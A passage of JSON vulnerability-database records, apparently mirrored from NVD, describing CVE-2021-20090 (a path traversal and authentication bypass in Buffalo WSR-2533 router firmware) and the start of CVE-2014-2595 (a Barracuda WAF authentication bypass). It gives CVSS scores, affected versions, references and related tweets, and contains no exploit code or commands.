"buffalo wsr-2533dhpl2-bk", "operator": "eq", "version": "-"}, {"cpeName": "buffalo:wsr-2533dhp3-bk", "name": "buffalo wsr-2533dhp3-bk", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "buffalo:wsr-2533dhpl2-bk_firmware", "name": "buffalo wsr-2533dhpl2-bk firmware", "operator": "le", "version": "1.02"}, {"cpeName": "buffalo:wsr-2533dhp3-bk_firmware", "name": "buffalo wsr-2533dhp3-bk firmware", "operator": "le", "version": "1.24"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:buffalo:wsr-2533dhp3-bk_firmware:1.24", "cpe:/o:buffalo:wsr-2533dhpl2-bk_firmware:1.02"], "cpe23": ["cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.02", "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:buffalo:wsr-2533dhpl2-bk:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}, {"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.24", "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:buffalo:wsr-2533dhp3-bk:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "cvelist": ["CVE-2021-20090"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-22"], "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-05-10T13:22:00", "references": [{"idList": ["VU:914124"], "type": "cert"}], "rev": 2}, "score": {"modified": "2021-05-10T13:22:00", "rev": 2, "value": 6.8, "vector": "NONE"}, "twitter": {"counter": 7, "modified": "2021-05-10T13:22:00", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1391673250812399623", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-20090 (wsr-2533dhpl2-bk_firmware, wsr-2533dhp3-bk_firmware)) has been published on https://t.co/bwDSzXihMu?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1390894328411791363", "text": " NEW: CVE-2021-20090 A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers ... (click for more) Severity: CRITICAL https://t.co/769YAufGBy?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1391673284329099264", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-20090 (wsr-2533dhpl2-bk_firmware, wsr-2533dhp3-bk_firmware)) has been published on https://t.co/IRH3LshCEd?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1391737441749512192", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-20090 (wsr-2533dhp3-bk_firmware, wsr-2533dhpl2-bk_firmware)) has been published on https://t.co/r6VB2aWYpq?amp=1"}, {"link": "https://twitter.com/FortifiedITLtd/status/1389626197387235330", "text": "CVE-2021-20090\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication"}, {"link": "https://twitter.com/FortifiedITLtd/status/1389626197387235330", "text": "CVE-2021-20090\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication"}, {"link": "https://twitter.com/threatintelctr/status/1391075525033140225", "text": " NEW: CVE-2021-20090 A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers ... (click for more) Severity: CRITICAL https://t.co/769YAufGBy?amp=1"}]}}, "extraReferences": [{"name": "https://www.tenable.com/security/research/tra-2021-13", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://www.tenable.com/security/research/tra-2021-13"}], "hash": "23300637555c908dd50068b31ce632688df5c341c20eb3c90988290d05a8326b", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "0658497da393ba8e7c2a5f76cfc6647b", "key": "cwe"}, {"hash": "431d91abfd47d1fcebb8c159419b3503", "key": "references"}, {"hash": "dd2bb057a9241e040a45d2e893c27b94", "key": "title"}, {"hash": "7dfa269c3282c554737011688a83d36b", "key": "description"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "08acfc31db5d0da2ed796dca91e9441b", "key": "cpeConfiguration"}, {"hash": "978efc8e6bfdf1fb0f8ab9f84526f625", "key": "cvelist"}, {"hash": "c65401b38827a50cb381b3b908cbc204", "key": "href"}, {"hash": "3a5598cc8ced616232c1cfe619757599", "key": "affectedConfiguration"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "5ed4fd1217b0877e8b4ac0426d406e97", "key": "published"}, {"hash": "f8044b9e0730904fa0827f12189d2f99", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "755da43829d726f231b7ad73020d198e", "key": "extraReferences"}, {"hash": "f6666cb98bd86565ebfe2b9b2f3c4361", "key": "cpe23"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "2e20ab1318aabfb0c3bbcb1d68cb156f", "key": "modified"}, {"hash": "0f60f23e2f6dc1d69739d63d19dd9f1f", "key": "affectedSoftware"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "1820aa677b5bd2704c3357ad453659df", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20090", "id": "CVE-2021-20090", "immutableFields": [], "lastseen": "2021-05-10T13:22:00", "modified": "2021-05-08T04:41:00", "objectVersion": "1.5", "published": "2021-04-29T15:15:00", "references": ["https://www.tenable.com/security/research/tra-2021-13"], "reporter": "vulnreport@tenable.com", "title": "CVE-2021-20090", "type": "cve", "viewCount": 3}, "different_elements": ["modified"], "edition": 2, "lastseen": "2021-05-10T13:22:00"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "buffalo:wsr-2533dhpl2-bk", "name": "buffalo wsr-2533dhpl2-bk", "operator": "eq", "version": "-"}, {"cpeName": "buffalo:wsr-2533dhp3-bk", "name": "buffalo wsr-2533dhp3-bk", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "buffalo:wsr-2533dhpl2-bk_firmware", "name": "buffalo wsr-2533dhpl2-bk firmware", "operator": "le", "version": "1.02"}, {"cpeName": "buffalo:wsr-2533dhp3-bk_firmware", "name": "buffalo wsr-2533dhp3-bk firmware", "operator": "le", "version": "1.24"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:buffalo:wsr-2533dhp3-bk_firmware:1.24", "cpe:/o:buffalo:wsr-2533dhpl2-bk_firmware:1.02"], "cpe23": ["cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.02", "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:buffalo:wsr-2533dhpl2-bk:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}, {"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.24", "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:buffalo:wsr-2533dhp3-bk:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "cvelist": ["CVE-2021-20090"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-22"], "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.", "edition": 3, "enchantments": {"dependencies": {"modified": "2021-07-21T07:49:26", "references": [{"idList": ["VU:914124"], "type": "cert"}], "rev": 2}, "score": {"modified": "2021-07-21T07:49:26", "rev": 2, "value": 6.8, "vector": "NONE"}, "twitter": {"counter": 8, "modified": "2021-07-21T07:49:26", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1391673250812399623", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-20090 (wsr-2533dhpl2-bk_firmware, wsr-2533dhp3-bk_firmware)) has been published on https://t.co/bwDSzXihMu?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1390894328411791363", "text": " NEW: CVE-2021-20090 A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers ... (click for more) Severity: CRITICAL https://t.co/769YAufGBy?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1391673284329099264", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-20090 (wsr-2533dhpl2-bk_firmware, wsr-2533dhp3-bk_firmware)) has been published on https://t.co/IRH3LshCEd?amp=1"}, {"link": "https://twitter.com/etguenni/status/1422146593684393990", "text": "Authentifizierungsschwachstelle CVE-2021-20090 bei Arcadyan-basierten Routern und Modems https://t.co/cGOfErLBQd?amp=1 /hashtag/Router?src=hashtag_click /hashtag/Sicherheit?src=hashtag_click Borns IT- & Windows-Blog"}, {"link": "https://twitter.com/WolfgangSesin/status/1391737441749512192", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-20090 (wsr-2533dhp3-bk_firmware, wsr-2533dhpl2-bk_firmware)) has been published on https://t.co/r6VB2aWYpq?amp=1"}, {"link": "https://twitter.com/FortifiedITLtd/status/1389626197387235330", "text": "CVE-2021-20090\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication"}, {"link": "https://twitter.com/FortifiedITLtd/status/1389626197387235330", "text": "CVE-2021-20090\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication"}, {"link": "https://twitter.com/threatintelctr/status/1391075525033140225", "text": " NEW: CVE-2021-20090 A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers ... (click for more) Severity: CRITICAL https://t.co/769YAufGBy?amp=1"}]}}, "extraReferences": [{"name": "https://www.tenable.com/security/research/tra-2021-13", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://www.tenable.com/security/research/tra-2021-13"}], "hash": "98f7ab0feada61b70b69da11ef422a090b48298f0ebf187af2d64663df6df654", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "0658497da393ba8e7c2a5f76cfc6647b", "key": "cwe"}, {"hash": "431d91abfd47d1fcebb8c159419b3503", "key": "references"}, {"hash": "dd2bb057a9241e040a45d2e893c27b94", "key": "title"}, {"hash": "7dfa269c3282c554737011688a83d36b", "key": "description"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "08acfc31db5d0da2ed796dca91e9441b", "key": "cpeConfiguration"}, {"hash": "978efc8e6bfdf1fb0f8ab9f84526f625", "key": "cvelist"}, {"hash": "e035e28f30ccf4ee02a4cbcbfdad5ec8", "key": "modified"}, {"hash": "c65401b38827a50cb381b3b908cbc204", "key": "href"}, {"hash": "3a5598cc8ced616232c1cfe619757599", "key": "affectedConfiguration"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "5ed4fd1217b0877e8b4ac0426d406e97", "key": "published"}, {"hash": "f8044b9e0730904fa0827f12189d2f99", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "755da43829d726f231b7ad73020d198e", "key": "extraReferences"}, {"hash": "f6666cb98bd86565ebfe2b9b2f3c4361", "key": "cpe23"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0f60f23e2f6dc1d69739d63d19dd9f1f", "key": "affectedSoftware"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "1820aa677b5bd2704c3357ad453659df", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20090", "id": "CVE-2021-20090", "immutableFields": [], "lastseen": "2021-07-21T07:49:26", "modified": "2021-07-20T22:15:00", "objectVersion": "1.5", "published": "2021-04-29T15:15:00", "references": ["https://www.tenable.com/security/research/tra-2021-13"], "reporter": "vulnreport@tenable.com", "title": "CVE-2021-20090", "type": "cve", "viewCount": 3}, "different_elements": ["extraReferences", "references"], "edition": 3, "lastseen": "2021-07-21T07:49:26"}], "edition": 4, "hashmap": [{"key": "affectedConfiguration", "hash": "3a5598cc8ced616232c1cfe619757599"}, {"key": "affectedSoftware", "hash": "0f60f23e2f6dc1d69739d63d19dd9f1f"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "f8044b9e0730904fa0827f12189d2f99"}, {"key": "cpe23", "hash": "f6666cb98bd86565ebfe2b9b2f3c4361"}, {"key": "cpeConfiguration", "hash": "08acfc31db5d0da2ed796dca91e9441b"}, {"key": "cvelist", "hash": "978efc8e6bfdf1fb0f8ab9f84526f625"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "0658497da393ba8e7c2a5f76cfc6647b"}, {"key": "description", "hash": "7dfa269c3282c554737011688a83d36b"}, {"key": "extraReferences", "hash": "242ebc318a669416f587d9ec70958810"}, {"key": "href", "hash": "c65401b38827a50cb381b3b908cbc204"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "e035e28f30ccf4ee02a4cbcbfdad5ec8"}, {"key": "published", "hash": "5ed4fd1217b0877e8b4ac0426d406e97"}, {"key": "references", "hash": "ec91f76db60b4636c854a33ae4f11a5a"}, {"key": "reporter", "hash": "1820aa677b5bd2704c3357ad453659df"}, {"key": "title", "hash": "dd2bb057a9241e040a45d2e893c27b94"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "7a885070955575a0bf2c4b85da2921c3e82ed79d57115cefad878aed2b110cb2", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-08-04T15:52:30", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-08-04T15:52:30", "rev": 2}, "twitter": {"counter": 89, "tweets": [{"link": "https://twitter.com/jingbay/status/1425926071778746375", "text": "\u591a\u6570\u306e\u30d6\u30e9\u30f3\u30c9\u3067\u8ca9\u58f2\u3055\u308c\u3066\u3044\u308bArcadyan\u306e\u30eb\u30fc\u30bf\u306efirmware\u306b\u8106\u5f31\u6027\u304c\u898b\u3064\u304b\u308a\u5927\u554f\u984c\u306b\u3002\n\n\u65e5\u672c\u306eBuffalo\u306e\u30eb\u30fc\u30bf\u306e\u554f\u984c\u3082\u3053\u308c\u3068\u306e\u304a\u8a71\u3002\u8a8d\u8a3c\u3092\u56de\u907f\u3057\u3066BusyBox\u306eshell\u306b\u30a2\u30af\u30bb\u30b9\u53ef\u80fd\u3002CVE-2021-20090"}, {"link": "https://twitter.com/semcert/status/1426130676336693251", "text": "\u0628\u0627\u062a\u200c\u0646\u062a \u062c\u062f\u06cc\u062f \u0645\u06cc\u0631\u0627\u06cc\u060c \u0645\u0633\u06cc\u0631\u06cc\u0627\u0628\u200c\u0647\u0627\u06cc \u062e\u0627\u0646\u06af\u06cc \u0631\u0627 \u0647\u062f\u0641 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.\n\n\u0627\u06cc\u0646 /hashtag/\u0622\u0633\u06cc\u0628\u200c_\u067e\u0630\u06cc\u0631\u06cc?src=hashtag_click \u06a9\u0647 \u062f\u0627\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0647 CVE-2021-20090 \u0627\u0633\u062a\u060c \u062a\u0648\u0633\u0637 \u0645\u062d\u0642\u0642\u0627\u0646 \u0634\u0631\u06a9\u062a /hashtag/tenable?src=hashtag_click \u06a9\u0634\u0641 \u0648 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062a\u062c\u0647\u06cc\u0632\u0627\u062a \u06f2\u06f0 \u062a\u0648\u0644\u06cc\u062f\u06a9\u0646\u0646\u062f\u0647 \u0648 ISP \u0645\u062e\u062a\u0644\u0641 \u0631\u0627 \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f."}, {"link": "https://twitter.com/7sxbCK2UncBD5fA/status/1426127312916033547", "text": "Freshly Disclosed Vulnerability CVE-2021-20090 Exploited in the Wild | Official Juniper Networks Blogs"}, {"link": "https://twitter.com/matarturo/status/1426284426590363653", "text": "CVE-2021-20090 actively exploited to target millions of IoT devices worldwide.\n\nhttps://t.co/cs5jXszE0Y?amp=1"}, {"link": "https://twitter.com/balcazarf/status/1426602860637265923", "text": "Freshly Disclosed Vulnerability CVE-2021-20090 Exploited in the Wild | Official Juniper Networks Blogs https://t.co/ss17Hup0Uj?amp=1"}, {"link": "https://twitter.com/cyfirma/status/1426726479325372422", "text": "https://t.co/hIjyCA7mpK?amp=1\n* Kimsuky is attacking using PDF Documents - malware embedded in PDFs\n* FlyTrap, android malware, compromises thousands of Facebook accounts\n* CVE-2021-20090 with a CVSS Score 9.8 - potentially millions of devices such as home routers could be impacted."}, {"link": "https://twitter.com/JuniperNetworks/status/1429119369158828037", "text": "An active exploitation vulnerability \u2014 CVE-2021-20090 \u2014 was recently reported by Tenable. Get the details from Juniper Threat Labs."}, {"link": "https://twitter.com/infomgmttoday/status/1429141129866342401", "text": "This just in for /hashtag/IoT?src=hashtag_click: CVE-2021-20090 actively exploited to target millions of IoT devices worldwide by /securityaffairs"}, {"link": "https://twitter.com/orange_clover/status/1429271228221595659", "text": "WSR-2533DHP3\u3001WSR-2533DHPL2\u306f4/27\u306b\u66f4\u65b0\u7248\u306e\u30d5\u30a1\u30fc\u30e0\u30a6\u30a7\u30a2\u304c\u516c\u958b\u3055\u308c\u3066\u3066\u3001\nWSR-3200AX4S\u3001WXR-5700AX7S\nWSR-1166DHP2\u3001BBR-4HG\u3001BBR-4MG\u304cCVE-2021-20090\u8106\u5f31\u6027\u306e\u5bfe\u8c61\u88fd\u54c1\u306b\u8ffd\u52a0\u3055\u308c\u305f\u306e\u304b\u3002\n\n\u300e\u30d0\u30c3\u30d5\u30a1\u30ed\u30fc\u88fdWi-Fi\u30eb\u30fc\u30bf\u30fc\u306b\u8106\u5f31\u6027\u300f"}, {"link": "https://twitter.com/FabianRODES/status/1430245784231063563", "text": "Pas affect\u00e9 par la CVE-2021-20090 affectant le firmware de certaines Livebox fibre, vu que cela fait + de 2 ans que je sollicite /OrangeHDF pour mon acc\u00e8s Pro \n\nEt si /srichard donnait autant de moyens \u00e0 ses ing\u00e9nieurs /orange que pour me d\u00e9ployer la fibre au centre de /hashtag/Lille?src=hashtag_click ?"}], "modified": "2021-08-04T15:52:30"}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4"]}], "modified": "2021-08-04T15:52:30"}}, "objectVersion": "1.6", "cpe": ["cpe:/o:buffalo:wsr-2533dhp3-bk_firmware:1.24", "cpe:/o:buffalo:wsr-2533dhpl2-bk_firmware:1.02"], "affectedSoftware": [{"cpeName": "buffalo:wsr-2533dhpl2-bk_firmware", "name": "buffalo wsr-2533dhpl2-bk firmware", "operator": "le", "version": "1.02"}, {"cpeName": "buffalo:wsr-2533dhp3-bk_firmware", "name": "buffalo wsr-2533dhp3-bk firmware", "operator": "le", "version": "1.24"}], "affectedConfiguration": [{"cpeName": "buffalo:wsr-2533dhpl2-bk", "name": "buffalo wsr-2533dhpl2-bk", "operator": "eq", "version": "-"}, {"cpeName": "buffalo:wsr-2533dhp3-bk", "name": "buffalo wsr-2533dhp3-bk", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.02", "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:buffalo:wsr-2533dhpl2-bk:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}, {"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.24", "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:buffalo:wsr-2533dhp3-bk:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://www.tenable.com/security/research/tra-2021-13", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://www.tenable.com/security/research/tra-2021-13"}, {"name": "VU#914124", "refsource": "CERT-VN", "tags": [], "url": "https://www.kb.cert.org/vuls/id/914124"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*"], "cwe": ["CWE-22"], "scheme": null}, {"bulletinFamily": "NVD", "hash": "6a0ace8cdb63863b470e6561269f441d83851201520bc6a55e7930a925c15e3a", "id": "CVE-2014-2595", "lastseen": "2021-04-22T23:44:08", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "cvelist": ["CVE-2014-2595"], "viewCount": 73, "modified": "2020-02-20T15:55:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "edition": 8, "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-13T14:29:47", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-13T14:29:47", "value": 6.9, "vector": "NONE"}}, "hash": "0d148bb322c927927cf5c8adaba4daf0d811bf2bee4917f93ca62ca2f942333e", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": 